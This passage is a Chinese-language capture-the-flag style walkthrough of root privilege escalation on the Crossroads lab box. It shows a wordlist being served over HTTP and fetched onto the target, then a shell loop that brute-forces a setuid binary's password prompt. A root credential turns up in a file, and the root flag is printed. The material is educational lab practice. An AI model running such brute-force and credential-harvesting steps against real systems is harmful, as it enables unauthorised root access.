└─$ diff 1727685571.6234832-376557ecdfc96397933f18a9fa06d6ac 1727685590.3163085-912a2e1251f29a2988cd930af38f3fa6

提权Root用户

除了标注井号的其他都没啥价值，用head分别看了两个文件的前十行，结果是一样的，顺便可以使用diff交叉验证一下是否一致，ok啊，那就随便挑一个用，里面的密码绝对就是上面beroot脚本的密码，传到靶机上再操作

┌──(kali㉿kali)-[~/temp/corssroad/output/keepers]
└─$ mv 1727685571.6234832-376557ecdfc96397933f18a9fa06d6ac a.txt
┌──(kali㉿kali)-[~/temp/corssroad/output/keepers]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.56.119 - - [30/Sep/2024 04:48:10] "GET /a.txt HTTP/1.1" 200 -
^C
Keyboard interrupt received, exiting.
┌──(kali㉿kali)-[~/temp/corssroad/output/keepers]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.56.119 - - [30/Sep/2024 04:48:10] "GET /a.txt HTTP/1.1" 200 -
^C
Keyboard interrupt received, exiting.
albert@crossroads:/home/albert$ wget 192.168.56.102:8000/a.txt
albert@crossroads:/home/albert$ for i in $(cat a.txt);do echo $i >>tmp;echo $i|./beroot>>tmp;done	##这里使用shell脚本来跑，遍历a.txt中的内容，先把密码写到tmp中，再将执行.beroot后的结果追加到tmp中
albert@crossroads:/home/albert$ ls -al
total 2108
drwxr-xr-x 3 albert albert    4096 Sep 13 04:04 .
drwxr-xr-x 3 root   root      4096 Mar  2  2021 ..
-rw-rw-rw- 1 albert albert  363321 Sep 30  2024 a.txt
-rw------- 1 albert albert     625 Sep 13 03:30 .bash_history
-rwsr-xr-x 1 root   root     16664 Mar  2  2021 beroot
-rw-r--r-- 1 albert albert 1583196 Mar  2  2021 crossroads.png
-rw------- 1 albert albert       7 Sep 10 10:05 .python_history
-rw-rw-rw- 1 root   albert      20 Sep 13 04:04 rootcreds
drwxrwxrwx 2 albert albert    4096 Sep 13 03:30 smbshare
-rw-rw-rw- 1 albert albert  159349 Sep 13 04:04 tmp
-r-x------ 1 albert albert      32 Mar  2  2021 user.txt
##其实这里眼尖的会发现有个rootcreds文件产生就类似于用户凭证，账户密码之类的
albert@crossroads:/home/albert$ cat rootcreds
root
___drifting___

到这其实就结束了，但是你如果没找到或者没发现，然后去查看tmp，会发现很多很难找，但你可以通过扩展的grep，egrep来筛选查找

albert@crossroads:/home/albert$ head tmp
lakers1
enter password for root
-----------------------

wrong password!!!
girls
enter password for root
-----------------------

wrong password!!!
albert@crossroads:/home/albert$ cat tmp | egrep -v 'wor|enter'		##这里你可以用wor和enter作为失败的关键特征，这样就可以发现不一样的地方了
panchito
-----------------------

nicole3
-----------------------

munchie
-----------------------

marcella
-----------------------

lemuel		##这个就是密码了
-----------------------

do ls and find root creds
katelynn
-----------------------

##.....中间省略了，不然篇幅太长了
Binary file (standard input) matches

albert@crossroads:/home/albert$ ./beroot
TERM environment variable not set.
enter password for root
-----------------------

password: lemuel
do ls and find root creds
albert@crossroads:/home/albert$ su -l root
Password:
root@crossroads:~# ls -al
total 32
drwx------  4 root root 4096 Sep 13 04:18 .
drwxr-xr-x 18 root root 4096 Dec 17  2020 ..
-rw-------  1 root root   57 Mar  6  2021 .bash_history
-rwx------  1 root root  345 Mar  6  2021 beroot.sh
-rw-r--r--  1 root root   20 Mar  2  2021 creds
drwx------  3 root root 4096 Sep 13 04:18 .gnupg
drwxr-xr-x  2 root root 4096 Mar  2  2021 passwd
-r-x------  1 root root   32 Mar  2  2021 root.txt
root@crossroads:~# cat root.txt
876F96716C3606B09A89F0FA3C1D52EB
root@crossroads:~#

这样就拿到了.beroot的密码了也可以获取发现creds凭证，这个靶机做的太艰险，两天了，还是看了答案的情况下，

结束~